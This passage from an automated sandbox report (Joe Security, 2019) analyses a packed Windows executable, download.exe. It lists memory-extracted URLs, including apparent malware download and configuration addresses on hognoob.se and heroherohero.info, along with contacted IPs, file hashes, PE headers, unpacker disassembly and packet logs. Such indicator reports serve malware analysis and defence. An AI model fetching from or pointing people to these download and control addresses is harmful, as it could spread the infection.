crl.certum.pl/ctnca.crl0k sqlisrv.exe, 00000004.00000001.5091079042.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000B.00000001.5183737893.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000C.00000001.5206506082.0000000000401000.00000040.sdmp, sqlisrv.exe, 0000001B.00000001.5573571405.000000000058C000.00000080.sdmp
false high
www.openssl.org/V sqlisrv.exe, 00000004.00000002.5101425693.0000000000401000.00000040.sdmp, b158ac7.exe, 0000000B.00000001.5183737893.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000C.00000002.6527504547.0000000000401000.00000040.sdmp, sqlisrv.exe, 0000001B.00000002.5578674251.0000000000401000.00000040.sdmp
false high
https://ifconfig.me/ sqlisrv.exe, 0000001B.00000001.5573571405.000000000058C000.00000080.sdmp
false high
schemas.xmlsoap.org/soap/envelope/ sqlisrv.exe, 0000001B.00000002.5578674251.0000000000401000.00000040.sdmp
false high
www.sysinternals.com sqlisrv.exe, 00000004.00000001.5091079042.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000B.00000001.5183737893.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000C.00000001.5206506082.0000000000401000.00000040.sdmp, sqlisrv.exe, 0000001B.00000001.5573571405.000000000058C000.00000080.sdmp
false high
truehttp://fid.hognoob.se/download.exeoffpxi.hognoob.se:35791pxx.hognoob.se:357891.updateIME
sqlisrv.exe, 00000004.00000002.5101425693.0000000000401000.00000040.sdmp, b158ac7.exe, 0000000B.00000002.5202663261.0000000000401000.00000040.sdmp, b158ac7.exe, 0000000C.00000002.6527504547.0000000000401000.00000040.sdmp, sqlisrv.exe, 0000001B.00000002.5578674251.0000000000401000.00000040.sdmp
true Avira URL Cloud: safe low
https://www.certum.pl/CPS0 sqlisrv.exe, 00000004.00000001.5091079042.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000B.00000001.5183737893.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000C.00000001.5206506082.0000000000401000.00000040.sdmp, sqlisrv.exe, 0000001B.00000001.5573571405.000000000058C000.00000080.sdmp
false high
crl.certum.pl/cscasha2.crl0q sqlisrv.exe, 00000004.00000001.5091079042.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000B.00000001.5183737893.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000C.00000001.5206506082.0000000000401000.00000040.sdmp, sqlisrv.exe, 0000001B.00000001.5573571405.000000000058C000.00000080.sdmp
false high
bea.com/2004/06/soap/workarea/ sqlisrv.exe, 0000001B.00000002.5578674251.0000000000401000.00000040.sdmp
false high
Name Source Malicious Antivirus Detection Reputation
Copyright Joe Security LLC 2019 Page 30 of 69
cscasha2.ocsp-certum.com04 sqlisrv.exe, 00000004.00000001.5091079042.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000B.00000001.5183737893.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000C.00000001.5206506082.0000000000401000.00000040.sdmp, sqlisrv.exe, 0000001B.00000001.5573571405.000000000058C000.00000080.sdmp
false high
u2. sqlisrv.exe, 00000004.00000001.5091079042.000000000058C000.00000080.sdmp, certutil.exe, 0000000A.00000003.5487030738.0000000005784000.00000004.sdmp
false Avira URL Cloud: safe unknown
fid.hognoob.se/download.exeC: sqlisrv.exe, 00000004.00000001.5091079042.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000B.00000001.5183737893.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000C.00000002.6527504547.0000000000401000.00000040.sdmp, sqlisrv.exe, 0000001B.00000001.5573571405.000000000058C000.00000080.sdmp
true Avira URL Cloud: safe unknown
repository.certum.pl/ctnca.cer0 sqlisrv.exe, 00000004.00000001.5091079042.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000B.00000001.5183737893.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000C.00000001.5206506082.0000000000401000.00000040.sdmp, sqlisrv.exe, 0000001B.00000001.5573571405.000000000058C000.00000080.sdmp
false high
blog.gentilkiwi.com/mimikatz sqlisrv.exe, 0000001B.00000001.5573571405.000000000058C000.00000080.sdmp
false high
www.zlib.net/D sqlisrv.exe, 00000004.00000001.5091079042.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000B.00000001.5183737893.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000C.00000002.6527504547.0000000000401000.00000040.sdmp, sqlisrv.exe, 0000001B.00000001.5573571405.000000000058C000.00000080.sdmp
false high
fid.hognoob.se/download.exe sqlisrv.exe, 0000001B.00000001.5573571405.000000000058C000.00000080.sdmp
false high
subca.ocsp-certum.com01 sqlisrv.exe, 00000004.00000001.5091079042.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000B.00000001.5183737893.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000C.00000001.5206506082.0000000000401000.00000040.sdmp, sqlisrv.exe, 0000001B.00000001.5573571405.000000000058C000.00000080.sdmp
false high
w.w3. sqlisrv.exe, 00000004.00000002.5101425693.0000000000401000.00000040.sdmp, b158ac7.exe, 0000000B.00000002.5202663261.0000000000401000.00000040.sdmp, b158ac7.exe, 0000000C.00000002.6527504547.0000000000401000.00000040.sdmp, sqlisrv.exe, 0000001B.00000002.5578674251.0000000000401000.00000040.sdmp
false high
2019.ip138.com/ic.asp sqlisrv.exe, 0000001B.00000001.5573571405.000000000058C000.00000080.sdmp
false high
uio.heroherohero.info:63145/cfg.ini b158ac7.exe, sqlisrv.exe, 0000001B.00000002.5578674251.0000000000401000.00000040.sdmp
false high
Name Source Malicious Antivirus Detection Reputation
Copyright Joe Security LLC 2019 Page 31 of 69
www.certum.pl/CPS0 sqlisrv.exe, 00000004.00000001.5091079042.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000B.00000001.5183737893.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000C.00000001.5206506082.0000000000401000.00000040.sdmp, sqlisrv.exe, 0000001B.00000001.5573571405.000000000058C000.00000080.sdmp
false high
fid.hognoob.se/download.execmd.exe sqlisrv.exe, 00000004.00000001.5091079042.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000B.00000001.5183737893.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000C.00000002.6527504547.0000000000401000.00000040.sdmp, sqlisrv.exe, 0000001B.00000001.5573571405.000000000058C000.00000080.sdmp
true Avira URL Cloud: safe unknown
Name Source Malicious Antivirus Detection Reputation
No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs
IP Country Flag ASN ASN Name Malicious
172.105.237.113 United States 63949 unknown false
172.104.161.101 United States 63949 unknown false
195.128.126.120 Russian Federation 47196 unknown false
IP
192.168.0.2
192.168.0.1
192.168.0.4
192.168.0.3
192.168.0.14
192.168.0.9
192.168.0.15
192.168.0.16
192.168.0.17
192.168.0.6
Contacted IPs
Public
Private
Copyright Joe Security LLC 2019 Page 32 of 69
192.168.0.18
192.168.0.5
192.168.0.19
192.168.0.8
192.168.0.7
192.168.0.20
192.168.0.21
192.168.0.22
192.168.0.23
192.168.0.24
192.168.0.10
192.168.0.11
192.168.0.12
192.168.0.13
192.168.0.170
192.168.0.172
192.168.0.171
192.168.0.58
192.168.0.59
192.168.0.61
192.168.0.62
192.168.0.63
192.168.0.64
192.168.0.65
192.168.0.66
192.168.0.67
192.168.0.68
192.168.0.178
192.168.0.177
192.168.0.179
192.168.0.174
192.168.0.173
192.168.0.176
192.168.0.60
192.168.0.175
192.168.0.161
192.168.0.160
192.168.0.47
192.168.0.48
192.168.0.49
192.168.0.50
192.168.0.51
192.168.0.52
192.168.0.53
192.168.0.54
192.168.0.55
192.168.0.56
192.168.0.57
192.168.0.167
192.168.0.166
192.168.0.169
192.168.0.168
192.168.0.163
192.168.0.162
127.0.0.1
192.168.0.165
192.168.0.164
192.168.0.192
192.168.0.191
192.168.0.194
192.168.0.193
192.168.0.190
192.168.0.36
192.168.0.37
IP
Copyright Joe Security LLC 2019 Page 33 of 69
Static File Info
GeneralFile type: PE32 executable (GUI) Intel 80386, for MS Windows,
UPX compressed
Entropy (8bit): 7.927054570350866
TrID: Win32 Executable (generic) a (10002005/4) 99.66%UPX compressed Win32 Executable (30571/9) 0.30%Generic Win/DOS Executable (2004/3) 0.02%DOS Executable Generic (2002/1) 0.02%Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: download.exe
File size: 322560
MD5: 31e46700743faa4304532b36311e1177
SHA1: 63e939ba9344836cd7e62fc0da531f421f96c645
SHA256: 364faa9f9bec15ad226a2b4a03869ec42ad5aa7f2d6c99c65690d4b1de48a0dc
SHA512: 7e75fd7ab1931be15841dcdcd774ab93680ecde9d95241fe13c593e8fbf29aa245f2a7ff29cc1f7590b6319da6d25ea558dad99853e925e62bc8026edb77b998
SSDEEP: 6144:wr3mS3XmD1Jx5LpCKN4NalDAmD+z0fH9rK5Bdd+qaggVM/EaG8v:wiS3g1Jx5LpbEYnM0FQ7abm/3
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*s$.n.JOn.JOn.JO..FOm.JO..DOE.JOX4@O..JO8.YOB.JOn.KO..JO..YOy.JOX4AO0.JO..AO>[email protected]'.JO..LOo.JORichn.JO........PE..L..
File Icon
Icon Hash: 00828e8e8686b000
192.168.0.38
192.168.0.39
192.168.0.40
192.168.0.41
192.168.0.42
192.168.0.43
192.168.0.44
192.168.0.45
192.168.0.46
192.168.0.199
192.168.0.196
192.168.0.195
192.168.0.198
192.168.0.197
192.168.0.181
192.168.0.180
192.168.0.183
192.168.0.182
192.168.0.25
192.168.0.26
192.168.0.27
192.168.0.28
192.168.0.29
IP
GeneralEntrypoint: 0x4dc1d0
Static PE Info
Copyright Joe Security LLC 2019 Page 34 of 69
Entrypoint Section: UPX1
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp: 0x5CD8F147 [Mon May 13 04:23:35 2019 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: c2ee7d277580fccb850519e0885ea7e1
General
Instruction
pushad
mov esi, 0048E000h
lea edi, dword ptr [esi-0008D000h]
push edi
jmp 00007F093078760Dh
nop
mov al, byte ptr [esi]
inc esi
mov byte ptr [edi], al
inc edi
add ebx, ebx
jne 00007F0930787609h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F09307875EFh
mov eax, 00000001h
add ebx, ebx
jne 00007F0930787609h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc eax, eax
add ebx, ebx
jnc 00007F093078760Dh
jne 00007F093078762Ah
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F0930787621h
dec eax
add ebx, ebx
jne 00007F0930787609h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc eax, eax
jmp 00007F09307875D6h
add ebx, ebx
jne 00007F0930787609h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc ecx, ecx
Entrypoint Preview
Copyright Joe Security LLC 2019 Page 35 of 69
jmp 00007F0930787654h
xor ecx, ecx
sub eax, 03h
jc 00007F0930787613h
shl eax, 08h
mov al, byte ptr [esi]
inc esi
xor eax, FFFFFFFFh
je 00007F0930787677h
sar eax, 1
mov ebp, eax
jmp 00007F093078760Dh
add ebx, ebx
jne 00007F0930787609h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F09307875CEh
inc ecx
add ebx, ebx
jne 00007F0930787609h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F09307875C0h
add ebx, ebx
jne 00007F0930787609h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc ecx, ecx
add ebx, ebx
jnc 00007F09307875F1h
jne 00007F093078760Bh
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jnc 00007F09307875E6h
add ecx, 02h
cmp ebp, FFFFFB00h
adc ecx, 02h
lea edx, dword ptr [edi+ebp]
cmp ebp, FFFFFFFCh
jbe 00007F0930787610h
mov al, byte ptr [edx]
Instruction
Programming Language: [C++] VS98 (6.0) SP6 build 8804[C++] VS98 (6.0) build 8168[EXP] VC++ 6.0 SP5 build 8804[ C ] VS98 (6.0) SP6 build 8804[ C ] VS98 (6.0) build 8168
Name Virtual Address Virtual Size Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT 0x0 0x0
IMAGE_DIRECTORY_ENTRY_IMPORT 0xdd000 0x314 UPX2
IMAGE_DIRECTORY_ENTRY_RESOURCE 0x0 0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION 0x0 0x0
IMAGE_DIRECTORY_ENTRY_SECURITY 0x0 0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC 0x0 0x0
IMAGE_DIRECTORY_ENTRY_DEBUG 0x0 0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT 0x0 0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR 0x0 0x0
Rich Headers
Data Directories
Copyright Joe Security LLC 2019 Page 36 of 69
Network Port Distribution
Total Packets: 91
• 53 (DNS)
• 9456 undefined
• 80 (HTTP)
IMAGE_DIRECTORY_ENTRY_TLS 0x0 0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG 0x0 0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT 0x0 0x0
IMAGE_DIRECTORY_ENTRY_IAT 0x0 0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT 0x0 0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR 0x0 0x0
IMAGE_DIRECTORY_ENTRY_RESERVED 0x0 0x0
Name Virtual Address Virtual Size Is in Section
Name Virtual Address Virtual Size Raw Size Xored PE ZLIB Complexity File Type Entropy Characteristics
UPX0 0x1000 0x8d000 0x0 False 0 empty 0.0 IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
UPX1 0x8e000 0x4f000 0x4e400 False 0.99159781849 data 7.93228374473 IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
UPX2 0xdd000 0x1000 0x400 False 0.3818359375 data 3.35216759537 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
DLL Import
ADVAPI32.dll RegCloseKey
COMCTL32.dll
comdlg32.dll ChooseColorA
GDI32.dll PatBlt
KERNEL32.DLL LoadLibraryA, ExitProcess, GetProcAddress, VirtualProtect
ole32.dll OleInitialize
OLEAUT32.dll LoadTypeLib
RASAPI32.dll RasHangUpA
SHELL32.dll ShellExecuteA
USER32.dll GetDC
WININET.dll InternetOpenA
WINMM.dll waveOutOpen
WINSPOOL.DRV OpenPrinterA
WS2_32.dll inet_ntoa
Network Behavior
Sections
Imports
TCP Packets
Copyright Joe Security LLC 2019 Page 37 of 69
Timestamp Source Port Dest Port Source IP Dest IP
May 16, 2019 17:15:39.132663965 CEST 49797 80 192.168.2.5 45.67.14.164
May 16, 2019 17:15:39.180200100 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.183634996 CEST 49798 9456 192.168.2.5 23.106.122.2
May 16, 2019 17:15:39.183851957 CEST 49797 80 192.168.2.5 45.67.14.164
May 16, 2019 17:15:39.184736013 CEST 49797 80 192.168.2.5 45.67.14.164
May 16, 2019 17:15:39.233027935 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.233145952 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.233315945 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.233326912 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.233336926 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.233350992 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.233360052 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.233367920 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.233536959 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.233547926 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.233556986 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.238857985 CEST 49797 80 192.168.2.5 45.67.14.164
May 16, 2019 17:15:39.239150047 CEST 49797 80 192.168.2.5 45.67.14.164
May 16, 2019 17:15:39.286458015 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.286477089 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.286485910 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.286504030 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.286513090 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.286595106 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.286619902 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.286629915 CEST 49797 80 192.168.2.5 45.67.14.164
May 16, 2019 17:15:39.286633015 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.286649942 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.286689997 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.286703110 CEST 49797 80 192.168.2.5 45.67.14.164
May 16, 2019 17:15:39.286705971 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.286756039 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.286761045 CEST 49797 80 192.168.2.5 45.67.14.164
May 16, 2019 17:15:39.286775112 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.286803007 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.286818981 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.286834002 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.286859989 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.286875010 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.286890984 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.286906004 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.287177086 CEST 49797 80 192.168.2.5 45.67.14.164
May 16, 2019 17:15:39.335172892 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335196972 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335212946 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335227013 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335242033 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335257053 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335303068 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335318089 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335328102 CEST 49797 80 192.168.2.5 45.67.14.164
May 16, 2019 17:15:39.335333109 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335356951 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335393906 CEST 49797 80 192.168.2.5 45.67.14.164
May 16, 2019 17:15:39.335417032 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335433006 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335448027 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335474968 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335489988 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335505962 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335535049 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335570097 CEST 49797 80 192.168.2.5 45.67.14.164
May 16, 2019 17:15:39.335597038 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335612059 CEST 80 49797 45.67.14.164 192.168.2.5
Copyright Joe Security LLC 2019 Page 38 of 69
May 16, 2019 17:15:39.335627079 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335640907 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335655928 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335690022 CEST 49797 80 192.168.2.5 45.67.14.164
May 16, 2019 17:15:39.335712910 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335728884 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335742950 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335757971 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335772991 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335802078 CEST 49797 80 192.168.2.5 45.67.14.164
May 16, 2019 17:15:39.335834980 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335850000 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335863113 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335876942 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335891962 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335920095 CEST 49797 80 192.168.2.5 45.67.14.164
May 16, 2019 17:15:39.335956097 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335971117 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335985899 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.335999966 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.336013079 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.336036921 CEST 49797 80 192.168.2.5 45.67.14.164
May 16, 2019 17:15:39.336071968 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.336086988 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.336102009 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.336457014 CEST 49797 80 192.168.2.5 45.67.14.164
May 16, 2019 17:15:39.346796036 CEST 9456 49798 23.106.122.2 192.168.2.5
May 16, 2019 17:15:39.382832050 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.382937908 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.382958889 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.382980108 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.382998943 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.383064985 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.383124113 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.383143902 CEST 80 49797 45.67.14.164 192.168.2.5
May 16, 2019 17:15:39.383162975 CEST 80 49797 45.67.14.164 192.168.2.5
Timestamp Source Port Dest Port Source IP Dest IP
Timestamp Source Port Dest Port Source IP Dest IP
May 16, 2019 17:15:39.070086956 CEST 58937 53 192.168.2.5 8.8.8.8
May 16, 2019 17:15:39.110205889 CEST 53 58937 8.8.8.8 192.168.2.5
May 16, 2019 17:15:39.144161940 CEST 62548 53 192.168.2.5 8.8.8.8
May 16, 2019 17:15:39.171838999 CEST 53 62548 8.8.8.8 192.168.2.5
May 16, 2019 17:15:40.738154888 CEST 53311 53 192.168.2.5 8.8.8.8
May 16, 2019 17:15:40.765496016 CEST 53 53311 8.8.8.8 192.168.2.5
May 16, 2019 17:15:42.426970959 CEST 54455 53 192.168.2.5 8.8.8.8
May 16, 2019 17:15:42.460274935 CEST 53 54455 8.8.8.8 192.168.2.5
May 16, 2019 17:15:44.085347891 CEST 54772 53 192.168.2.5 8.8.8.8
May 16, 2019 17:15:44.124200106 CEST 53 54772 8.8.8.8 192.168.2.5
May 16, 2019 17:15:44.132404089 CEST 58460 53 192.168.2.5 8.8.8.8
May 16, 2019 17:15:44.177515984 CEST 53 58460 8.8.8.8 192.168.2.5
May 16, 2019 17:15:45.823421955 CEST 58876 53 192.168.2.5 8.8.8.8
May 16, 2019 17:15:45.850907087 CEST 53 58876 8.8.8.8 192.168.2.5
May 16, 2019 17:15:46.941581011 CEST 58501 53 192.168.2.5 8.8.8.8
May 16, 2019 17:15:47.003392935 CEST 53 58501 8.8.8.8 192.168.2.5
May 16, 2019 17:15:47.482274055 CEST 53388 53 192.168.2.5 8.8.8.8
May 16, 2019 17:15:47.510266066 CEST 53 53388 8.8.8.8 192.168.2.5
May 16, 2019 17:15:50.849494934 CEST 58724 53 192.168.2.5 8.8.8.8
May 16, 2019 17:15:50.876676083 CEST 53 58724 8.8.8.8 192.168.2.5
May 16, 2019 17:15:52.489936113 CEST 60822 53 192.168.2.5 8.8.8.8
May 16, 2019 17:15:52.517611027 CEST 53 60822 8.8.8.8 192.168.2.5
May 16, 2019 17:15:53.103890896 CEST 58429 53 192.168.2.5 8.8.8.8
May 16, 2019 17:15:53.131223917 CEST 53 58429 8.8.8.8 192.168.2.5
UDP Packets
Copyright Joe Security LLC 2019 Page 39 of 69
May 16, 2019 17:15:53.375061035 CEST 55467 53 192.168.2.5 8.8.8.8
May 16, 2019 17:15:53.403254986 CEST 53 55467 8.8.8.8 192.168.2.5
May 16, 2019 17:15:53.576452971 CEST 52386 53 192.168.2.5 8.8.8.8
May 16, 2019 17:15:53.603751898 CEST 53 52386 8.8.8.8 192.168.2.5
May 16, 2019 17:15:54.214173079 CEST 64452 53 192.168.2.5 8.8.8.8
May 16, 2019 17:15:54.274655104 CEST 53 64452 8.8.8.8 192.168.2.5
May 16, 2019 17:15:55.937410116 CEST 57162 53 192.168.2.5 8.8.8.8
May 16, 2019 17:15:55.964837074 CEST 53 57162 8.8.8.8 192.168.2.5
May 16, 2019 17:15:57.639635086 CEST 63777 53 192.168.2.5 8.8.8.8
May 16, 2019 17:15:57.666914940 CEST 53 63777 8.8.8.8 192.168.2.5
May 16, 2019 17:15:59.347651005 CEST 52431 53 192.168.2.5 8.8.8.8
May 16, 2019 17:15:59.374690056 CEST 53 52431 8.8.8.8 192.168.2.5
May 16, 2019 17:16:01.130189896 CEST 62217 53 192.168.2.5 8.8.8.8
May 16, 2019 17:16:01.157440901 CEST 53 62217 8.8.8.8 192.168.2.5
May 16, 2019 17:16:02.812659025 CEST 57684 53 192.168.2.5 8.8.8.8
May 16, 2019 17:16:02.839837074 CEST 53 57684 8.8.8.8 192.168.2.5
May 16, 2019 17:16:04.547229052 CEST 52990 53 192.168.2.5 8.8.8.8
May 16, 2019 17:16:04.574561119 CEST 53 52990 8.8.8.8 192.168.2.5
May 16, 2019 17:16:06.240150928 CEST 49515 53 192.168.2.5 8.8.8.8
May 16, 2019 17:16:06.274620056 CEST 53 49515 8.8.8.8 192.168.2.5
May 16, 2019 17:16:08.306943893 CEST 61794 53 192.168.2.5 8.8.8.8
May 16, 2019 17:16:08.335238934 CEST 53 61794 8.8.8.8 192.168.2.5
May 16, 2019 17:16:12.969938040 CEST 58256 53 192.168.2.5 8.8.8.8
May 16, 2019 17:16:13.009057045 CEST 53 58256 8.8.8.8 192.168.2.5
May 16, 2019 17:16:14.651127100 CEST 59078 53 192.168.2.5 8.8.8.8
May 16, 2019 17:16:14.664491892 CEST 53 59078 8.8.8.8 192.168.2.5
May 16, 2019 17:16:21.065387964 CEST 53453 53 192.168.2.5 8.8.8.8
May 16, 2019 17:16:21.092657089 CEST 53 53453 8.8.8.8 192.168.2.5
May 16, 2019 17:16:22.791235924 CEST 56313 53 192.168.2.5 8.8.8.8
May 16, 2019 17:16:22.818922043 CEST 53 56313 8.8.8.8 192.168.2.5
May 16, 2019 17:16:24.500495911 CEST 50140 53 192.168.2.5 8.8.8.8
May 16, 2019 17:16:24.528129101 CEST 53 50140 8.8.8.8 192.168.2.5
May 16, 2019 17:16:26.195426941 CEST 63107 53 192.168.2.5 8.8.8.8
May 16, 2019 17:16:26.223279953 CEST 53 63107 8.8.8.8 192.168.2.5
May 16, 2019 17:16:31.800149918 CEST 60885 53 192.168.2.5 8.8.8.8
May 16, 2019 17:16:31.827606916 CEST 53 60885 8.8.8.8 192.168.2.5
May 16, 2019 17:16:33.498259068 CEST 51827 53 192.168.2.5 8.8.8.8
May 16, 2019 17:16:33.529900074 CEST 53 51827 8.8.8.8 192.168.2.5
May 16, 2019 17:16:35.433422089 CEST 54050 53 192.168.2.5 8.8.8.8
May 16, 2019 17:16:35.461162090 CEST 53 54050 8.8.8.8 192.168.2.5
